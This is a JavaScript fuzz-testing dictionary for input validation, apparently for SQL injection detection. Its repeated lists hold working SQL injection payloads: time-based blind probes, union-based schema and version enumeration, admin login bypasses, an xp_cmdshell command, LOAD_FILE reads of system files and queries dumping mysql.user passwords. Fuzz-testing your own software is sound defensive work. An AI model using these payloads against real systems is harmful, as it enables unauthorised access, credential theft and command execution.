/*
Author: Rajeev Pramanik
Description: This Script has list of keywords (BLIND SQL, Reserve Keywords and much) for fuzz testing.
Timestamp: 29th Sept 2021 11:30 AM
*/

export const fuzzDict = {
    STRING_FUZZ: [, '', "", ``, 1, -1, -999, -0, 0, -999999999999999,-0.9999999999999,-0.00000000000009, 'undefined',"0", "-1", 'null', true, false, 'true', 'false', null, undefined, "NULL", "UNDEFINED", "TRUE", "FALSE", "NaN", "-Infinity", "Infinity", "error",1595905573000, -1595905573000, 1690513573000, -1690513573000],
    STRING_EVENT_NAME_FUZZ: [, true, false, null, undefined],
    NUMBER_FUZZ: [, '', "", ``, -0.9999999999999, -0.00000000000009, true, false, null, undefined, -0, "0", "-1", "NULL", "UNDEFINED", "TRUE", "FALSE", "NaN", "-Infinity", "Infinity", "error"],
    TIME_FUZZ: [, '', "", ``, -0.9999999999999, -0.00000000000009, true, false, null, undefined, 0, "0", "1", "-1", "NULL", "UNDEFINED", "TRUE", "FALSE", "NaN", "-Infinity", "Infinity", "error", 1595905573000, -1595905573000, 1690513573000, -1690513573000],
    PAST_TIME_FUZZ: [, '', "", ``, -0.9999999999999, -0.00000000000009, true, false, null, undefined, 0, "0", "1", "-1", "NULL", "UNDEFINED", "TRUE", "FALSE", "NaN", "-Infinity", "Infinity", "error", 1595905573000, -1595905573000],
    SQL_INJECTION_DECTECTION_FUZZ: [
        
        , 
        '', 
        "", 
        ``, 
        1, 
        -1, 
        -999, 
        -0, 
        0, 
        -999999999999999,
        -0.9999999999999,
        -0.00000000000009, 
        'undefined',
        "0", 
        "-1", 
        'null', 
        true, 
        false, 
        'true', 
        'false', 
        null, 
        undefined, 
        "NULL", 
        "UNDEFINED",
        "TRUE", 
        "FALSE", 
        "NaN", 
        -Infinity, 
        "-Infinity", 
        Infinity, 
        "Infinity", 
        "error", 
        1595905573000, 
        -1595905573000, 
        1690513573000, 
        -1690513573000, 

        /* BLIND SQL INJECTION DECTECTION LIST */

        "; --",
        "'; --",
        "'); --",
        "'; exec master..xp_cmdshell 'ping 10.10.1.2'--",
        "' grant connect to name; grant resource to name; --",
        "' or 1=1 -- ",
        "' union (select @@version) --",
        "' union (select NULL, (select @@version)) --",
        "' union (select NULL, NULL, (select @@version)) --",
        "' union (select NULL, NULL, NULL,  (select @@version)) --",
        "' union (select NULL, NULL, NULL, NULL,  (select @@version)) --",
        "' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --",
        `sleep(5)#`,
        `1 or sleep(5)#`,
        `" or sleep(5)#`,
        `' or sleep(5)#`,
        `" or sleep(5)="`,
        `' or sleep(5)='`,
        `1) or sleep(5)#`,
        `") or sleep(5)="`,
        `') or sleep(5)='`,
        `1)) or sleep(5)#`,
        `")) or sleep(5)="`,
        `')) or sleep(5)='`,
        `;waitfor delay '0:0:5'--`,
        `);waitfor delay '0:0:5'--`,
        `';waitfor delay '0:0:5'--`,
        `";waitfor delay '0:0:5'--`,
        `');waitfor delay '0:0:5'--`,
        `");waitfor delay '0:0:5'--`,
        `));waitfor delay '0:0:5'--`,
        `'));waitfor delay '0:0:5'--`,
        `"));waitfor delay '0:0:5'--`,
        `benchmark(10000000,MD5(1))#`,
        `1 or benchmark(10000000,MD5(1))#`,
        `" or benchmark(10000000,MD5(1))#`,
        `' or benchmark(10000000,MD5(1))#`,
        `1) or benchmark(10000000,MD5(1))#`,
        `") or benchmark(10000000,MD5(1))#`,
        `') or benchmark(10000000,MD5(1))#`,
        `1)) or benchmark(10000000,MD5(1))#`,
        `")) or benchmark(10000000,MD5(1))#`,
        `')) or benchmark(10000000,MD5(1))#`,
        "pg_sleep(5)--",
        `1 or pg_sleep(5)--`,
        " or pg_sleep(5)--",
        ' or pg_sleep(5)--',
        '1) or pg_sleep(5)--',
        '") or pg_sleep(5)--',
        "') or pg_sleep(5)--",
        "1)) or pg_sleep(5)--",
        ")) or pg_sleep(5)--",
        "')) or pg_sleep(5)--",
        
        /*SQL Injection Attacks */

        '-',
        ' ',
        '&',
        '^',
        '*',
        "' or ''-'",
        "' or '' '",
        "' or ''&'",
        "' or ''^'",
        "' or ''*'",
        "-",
        " ",
        "&",
        "^",
        "*",
        '" or ""-"',
        '" or "" "',
        '" or ""&"',
        '" or ""^"',
        '" or ""*"',
        "or true--",
        " or true--",
        ' or true--',
        ") or true--",
        ') or true--',
        "' or 'x'='x",
        "') or ('x')=('x",
        "')) or (('x'))=(('x",
        '" or "x"="x',
        '") or ("x")=("x',
        '")) or (("x"))=(("x',

        "admin' or '1'='1",
        "admin' or '1'='1'--",
        "admin' or '1'='1'#",
        "admin' or '1'='1'/*",
        "admin'or 1=1 or ''='",
        "admin' or 1=1",
        "admin' or 1=1--",
        "admin' or 1=1#",
        "admin' or 1=1/*",
        "admin') or ('1'='1",
        "admin') or ('1'='1'--",
        "admin') or ('1'='1'#",
        "admin') or ('1'='1'/*",
        "admin') or '1'='1",
        "admin') or '1'='1'--",
        "admin') or '1'='1'#",
        "admin') or '1'='1'/*",
        "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
        'admin" --',
        'admin" #',
        'admin"/*',
        'admin" or "1"="1',
        'admin" or "1"="1"--',
        'admin" or "1"="1"#',
        'admin" or "1"="1"/*',
        'admin"or 1=1 or ""="',
        'admin" or 1=1',
        'admin" or 1=1--',
        'admin" or 1=1#',
        'admin" or 1=1/*',
        'admin") or ("1"="1',
        'admin") or ("1"="1"--',
        'admin") or ("1"="1"#',
        'admin") or ("1"="1"/*',
        'admin") or "1"="1',
        'admin") or "1"="1"--',
        'admin") or "1"="1"#',
        'admin") or "1"="1"/*',
        '1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055',

        "admin'--",
        "admin' #",
        "admin'/*",
        "' or 1=1--",
        "' or 1=1#",
        "' or 1=1/*",
        "') or '1'='1--",
        "') or ('1'='1--",
        "SELECT login + '-' + password FROM members",
        "SELECT login || '-' || password FROM members",
        "if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0",
        "SELECT IF(1=1,'true','false')",
        "' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--",
        "SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members",
        "' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--",
        "SELECT CONCAT('0x',HEX('c:\\boot.ini'))",
        "SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))",
        "SELECT CHAR(75)+CHAR(76)+CHAR(77)",
        "SELECT CHR(75)||CHR(76)||CHR(77)",
        "SELECT (CHaR(75)||CHaR(76)||CHaR(77))",
        "SELECT LOAD_FILE(0x633A5C626F6F742E696E69)",
        "SELECT /*!32302 1/0, */ 1 FROM tablename",
        "SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'",
        "/*! MYSQL Special SQL *",
        "SELECT /*!32302 1/0, */ 1 FROM tablename",
        "SELECT User,Password FROM mysql.user;",
        "SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';",
        "create function LockWorkStation returns integer soname 'user32';",
        "select LockWorkStation();",
        "create function ExitProcess returns integer soname 'kernel32';",
        "select exitprocess();",
        "SELECT USER();",
        "SELECT password,USER() FROM mysql.user;",
        "SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;",
        "create table foo( line blob );",
        "load data infile 'c:/boot.ini' into table foo;",
        "select * from foo;",
        "select benchmark( 500000, sha1( 'test' ) );",
        "select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );",
        "select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );",
        "SELECT sleep(10);",
        "SELECT pg_sleep(10);",
        "IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))",
        "IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))",
        "BENCHMARK(howmanytimes, do this)",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)",
        "SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'",
        "SELECT * FROM all_col_comments WHERE TABLE_NAME = 'TABLE'",
        "SELECT table_name FROM information_schema.tables WHERE table_schema = 'databasename'",
        "SELECT table_name, column_name FROM information_schema.columns WHERE table_name = 'tablename'",
        "';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--",
        "... WHERE users NOT IN ('First User', 'Second User') SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members)",
        "SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int",
        "Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21",
        "SELECT name FROM sysobjects WHERE xtype = 'U'",
        "SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')",
        "INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)",
        "'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*",
        "' union select sum(columntofind) from users-- (S) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.",
        "SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--",
        "11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-",
        "11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-",
        "11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --",
        "11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 –-",
        "11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 –-",
        "' HAVING 1=1 --",
        "' GROUP BY table.columnfromerror1 HAVING 1=1 --",
        "' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --",
        "' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 --",
        "admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'",
    ],
    LOGIN_SQL_INJECTION_DECTECTION_FUZZ: [
        
        , 
        '', 
        "", 
        ``, 
        '1', 
        '-1', 
        '-999', 
        '-0', 
        '0', 
        '-999999999999999',
        '-0.9999999999999',
        '-0.00000000000009', 
        'undefined',
        "0", 
        "-1", 
        'null', 
        'true', 
        'false', 
        'true', 
        'false', 
        'null', 
        'undefined', 
        "NULL", 
        "UNDEFINED",
        "TRUE", 
        "FALSE", 
        "NaN", 
        '-Infinity', 
        "-Infinity", 
        'Infinity', 
        "Infinity", 
        "error", 
        '1595905573000', 
        '-1595905573000', 
        '1690513573000', 
        '-1690513573000', 

        /* BLIND SQL INJECTION DECTECTION LIST */

        "; --",
        "'; --",
        "'); --",
        "'; exec master..xp_cmdshell 'ping 10.10.1.2'--",
        "' grant connect to name; grant resource to name; --",
        "' or 1=1 -- ",
        "' union (select @@version) --",
        "' union (select NULL, (select @@version)) --",
        "' union (select NULL, NULL, (select @@version)) --",
        "' union (select NULL, NULL, NULL,  (select @@version)) --",
        "' union (select NULL, NULL, NULL, NULL,  (select @@version)) --",
        "' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --",
        `sleep(5)#`,
        `1 or sleep(5)#`,
        `" or sleep(5)#`,
        `' or sleep(5)#`,
        `" or sleep(5)="`,
        `' or sleep(5)='`,
        `1) or sleep(5)#`,
        `") or sleep(5)="`,
        `') or sleep(5)='`,
        `1)) or sleep(5)#`,
        `")) or sleep(5)="`,
        `')) or sleep(5)='`,
        `;waitfor delay '0:0:5'--`,
        `);waitfor delay '0:0:5'--`,
        `';waitfor delay '0:0:5'--`,
        `";waitfor delay '0:0:5'--`,
        `');waitfor delay '0:0:5'--`,
        `");waitfor delay '0:0:5'--`,
        `));waitfor delay '0:0:5'--`,
        `'));waitfor delay '0:0:5'--`,
        `"));waitfor delay '0:0:5'--`,
        `benchmark(10000000,MD5(1))#`,
        `1 or benchmark(10000000,MD5(1))#`,
        `" or benchmark(10000000,MD5(1))#`,
        `' or benchmark(10000000,MD5(1))#`,
        `1) or benchmark(10000000,MD5(1))#`,
        `") or benchmark(10000000,MD5(1))#`,
        `') or benchmark(10000000,MD5(1))#`,
        `1)) or benchmark(10000000,MD5(1))#`,
        `")) or benchmark(10000000,MD5(1))#`,
        `')) or benchmark(10000000,MD5(1))#`,
        "pg_sleep(5)--",
        `1 or pg_sleep(5)--`,
        " or pg_sleep(5)--",
        ' or pg_sleep(5)--',
        '1) or pg_sleep(5)--',
        '") or pg_sleep(5)--',
        "') or pg_sleep(5)--",
        "1)) or pg_sleep(5)--",
        ")) or pg_sleep(5)--",
        "')) or pg_sleep(5)--",
        
        /*SQL Injection Attacks */

        '-',
        ' ',
        '&',
        '^',
        '*',
        "' or ''-'",
        "' or '' '",
        "' or ''&'",
        "' or ''^'",
        "' or ''*'",
        "-",
        " ",
        "&",
        "^",
        "*",
        '" or ""-"',
        '" or "" "',
        '" or ""&"',
        '" or ""^"',
        '" or ""*"',
        "or true--",
        " or true--",
        ' or true--',
        ") or true--",
        ') or true--',
        "' or 'x'='x",
        "') or ('x')=('x",
        "')) or (('x'))=(('x",
        '" or "x"="x',
        '") or ("x")=("x',
        '")) or (("x"))=(("x',

        "admin' or '1'='1",
        "admin' or '1'='1'--",
        "admin' or '1'='1'#",
        "admin' or '1'='1'/*",
        "admin'or 1=1 or ''='",
        "admin' or 1=1",
        "admin' or 1=1--",
        "admin' or 1=1#",
        "admin' or 1=1/*",
        "admin') or ('1'='1",
        "admin') or ('1'='1'--",
        "admin') or ('1'='1'#",
        "admin') or ('1'='1'/*",
        "admin') or '1'='1",
        "admin') or '1'='1'--",
        "admin') or '1'='1'#",
        "admin') or '1'='1'/*",
        "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
        'admin" --',
        'admin" #',
        'admin"/*',
        'admin" or "1"="1',
        'admin" or "1"="1"--',
        'admin" or "1"="1"#',
        'admin" or "1"="1"/*',
        'admin"or 1=1 or ""="',
        'admin" or 1=1',
        'admin" or 1=1--',
        'admin" or 1=1#',
        'admin" or 1=1/*',
        'admin") or ("1"="1',
        'admin") or ("1"="1"--',
        'admin") or ("1"="1"#',
        'admin") or ("1"="1"/*',
        'admin") or "1"="1',
        'admin") or "1"="1"--',
        'admin") or "1"="1"#',
        'admin") or "1"="1"/*',
        '1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055',

        "admin'--",
        "admin' #",
        "admin'/*",
        "' or 1=1--",
        "' or 1=1#",
        "' or 1=1/*",
        "') or '1'='1--",
        "') or ('1'='1--",
        "SELECT login + '-' + password FROM members",
        "SELECT login || '-' || password FROM members",
        "if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0",
        "SELECT IF(1=1,'true','false')",
        "' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--",
        "SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members",
        "' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--",
        "SELECT CONCAT('0x',HEX('c:\\boot.ini'))",
        "SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))",
        "SELECT CHAR(75)+CHAR(76)+CHAR(77)",
        "SELECT CHR(75)||CHR(76)||CHR(77)",
        "SELECT (CHaR(75)||CHaR(76)||CHaR(77))",
        "SELECT LOAD_FILE(0x633A5C626F6F742E696E69)",
        "SELECT /*!32302 1/0, */ 1 FROM tablename",
        "SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'",
        "/*! MYSQL Special SQL *",
        "SELECT /*!32302 1/0, */ 1 FROM tablename",
        "SELECT User,Password FROM mysql.user;",
        "SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';",
        "create function LockWorkStation returns integer soname 'user32';",
        "select LockWorkStation();",
        "create function ExitProcess returns integer soname 'kernel32';",
        "select exitprocess();",
        "SELECT USER();",
        "SELECT password,USER() FROM mysql.user;",
        "SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;",
        "create table foo( line blob );",
        "load data infile 'c:/boot.ini' into table foo;",
        "select * from foo;",
        "select benchmark( 500000, sha1( 'test' ) );",
        "select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );",
        "select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );",
        "SELECT sleep(10);",
        "SELECT pg_sleep(10);",
        "IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))",
        "IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))",
        "BENCHMARK(howmanytimes, do this)",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--",
        "SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)",
        "SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'",
        "SELECT * FROM all_col_comments WHERE TABLE_NAME = 'TABLE'",
        "SELECT table_name FROM information_schema.tables WHERE table_schema = 'databasename'",
        "SELECT table_name, column_name FROM information_schema.columns WHERE table_name = 'tablename'",
        "';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--",
        "... WHERE users NOT IN ('First User', 'Second User') SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members)",
        "SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int",
        "Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21",
        "SELECT name FROM sysobjects WHERE xtype = 'U'",
        "SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')",
        "INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)",
        "'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*",
        "' union select sum(columntofind) from users-- (S) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.",
        "SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--",
        "11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-",
        "11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-",
        "11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --",
        "11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 –-",
        "11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 –-",
        "' HAVING 1=1 --",
        "' GROUP BY table.columnfromerror1 HAVING 1=1 --",
        "' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --",
        "' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 --",
        "admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'",
    ],
    EXCEPT_NUMBER_SQL_INJECTION_DECTECTION_FUZZ: [
        
        , 
        '', 
        "", 
        ``,
        'null', 
        'true', 
        'false', 
        "NULL", 
        "UNDEFINED",
        "TRUE", 
        "FALSE", 
        "NaN", 
        "-Infinity", 
        "Infinity", 
        "error", 


        /* BLIND SQL INJECTION DECTECTION LIST */

        "; --",
        "'; --",
        "'); --",
        "'; exec master..xp_cmdshell 'ping 10.10.1.2'--",
        "' grant connect to name; grant resource to name; --",
        "' or 1=1 -- ",
        "' union (select @@version) --",
        "' union (select NULL, (select @@version)) --",
        "' union (select NULL, NULL, (select @@version)) --",
        "' union (select NULL, NULL, NULL,  (select @@version)) --",
        "' union (select NULL, NULL, NULL, NULL,  (select @@version)) --",
        "' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --",
        `sleep(5)#`,
        `1 or sleep(5)#`,
        `" or sleep(5)#`,
        `' or sleep(5)#`,
        `" or sleep(5)="`,
        `' or sleep(5)='`,
        `1) or sleep(5)#`,
        `") or sleep(5)="`,
        `') or sleep(5)='`,
        `1)) or sleep(5)#`,
        `")) or sleep(5)="`,
        `')) or sleep(5)='`,
        `;waitfor delay '0:0:5'--`,
        `);waitfor delay '0:0:5'--`,
        `';waitfor delay '0:0:5'--`,
        `";waitfor delay '0:0:5'--`,
        `');waitfor delay '0:0:5'--`,
        `");waitfor delay '0:0:5'--`,
        `));waitfor delay '0:0:5'--`,
        `'));waitfor delay '0:0:5'--`,
        `"));waitfor delay '0:0:5'--`,
        `benchmark(10000000,MD5(1))#`,
        `1 or benchmark(10000000,MD5(1))#`,
        `" or benchmark(10000000,MD5(1))#`,
        `' or benchmark(10000000,MD5(1))#`,
        `1) or benchmark(10000000,MD5(1))#`,
        `") or benchmark(10000000,MD5(1))#`,
        `') or benchmark(10000000,MD5(1))#`,
        `1)) or benchmark(10000000,MD5(1))#`,
        `")) or benchmark(10000000,MD5(1))#`,
        `')) or benchmark(10000000,MD5(1))#`,
        "pg_sleep(5)--",
        `1 or pg_sleep(5)--`,
        " or pg_sleep(5)--",
        ' or pg_sleep(5)--',
        '1) or pg_sleep(5)--',
        '") or pg_sleep(5)--',
        "') or pg_sleep(5)--",
        "1)) or pg_sleep(5)--",
        ")) or pg_sleep(5)--",
        "')) or pg_sleep(5)--",
        
        /*SQL Injection Attacks */

        '-',
        ' ',
        '&',
        '^',
        '*',
        "' or ''-'",
        "' or '' '",
        "' or ''&'",
        "' or ''^'",
        "' or ''*'",
        "-",
        " ",
        "&",
        "^",
        "*",
        '" or ""-"',
        '" or "" "',
        '" or ""&"',
        '" or ""^"',
        '" or ""*"',
        "or true--",
        " or true--",
        ' or true--',
        ") or true--",
        ') or true--',
        "' or 'x'='x",
        "') or ('x')=('x",
        "')) or (('x'))=(('x",
        '" or "x"="x',
        '") or ("x")=("x',
        '")) or (("x"))=(("x',

        "admin' or '1'='1",
        "admin' or '1'='1'--",
        "admin' or '1'='1'#",
        "admin' or '1'='1'/*",
        "admin'or 1=1 or ''='",
        "admin' or 1=1",
        "admin' or 1=1--",
        "admin' or 1=1#",
        "admin' or 1=1/*",
        "admin') or ('1'='1",
        "admin') or ('1'='1'--",
        "admin') or ('1'='1'#",
        "admin') or ('1'='1'/*",
        "admin') or '1'='1",
        "admin') or '1'='1'--",
        "admin') or '1'='1'#",
        "admin') or '1'='1'/*",
        "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
        'admin" --',
        'admin" #',
        'admin"/*',
        'admin" or "1"="1',
        'admin" or "1"="1"--',
        'admin" or "1"="1"#',
        'admin" or "1"="1"/*',
        'admin"or 1=1 or ""="',
        'admin" or 1=1',
        'admin" or 1=1--',
        'admin" or 1=1#',
        'admin" or 1=1/*',
        'admin") or ("1"="1',
        'admin") or ("1"="1"--',
        'admin") or ("1"="1"#',
        'admin") or ("1"="1"/*',
        'admin") or "1"="1',
        'admin") or "1"="1"--',
        'admin") or "1"="1"#',
        'admin") or "1"="1"/*',
        '1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055',

        "admin'--",
        "admin' #",
        "admin'/*",
        "' or 1=1--",
        "' or 1=1#",
        "' or 1=1/*",
        "') or '1'='1--",
        "') or ('1'='1--",
        "SELECT login + '-' + password FROM members",
        "SELECT login || '-' || password FROM members",
        "if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0",
        "SELECT IF(1=1,'true','false')",
        "' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--",
        "SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members",
        "' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--",
        "SELECT CONCAT('0x',HEX('c:\\boot.ini'))",
        "SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))",
        "SELECT CHAR(75)+CHAR(76)+CHAR(77)",
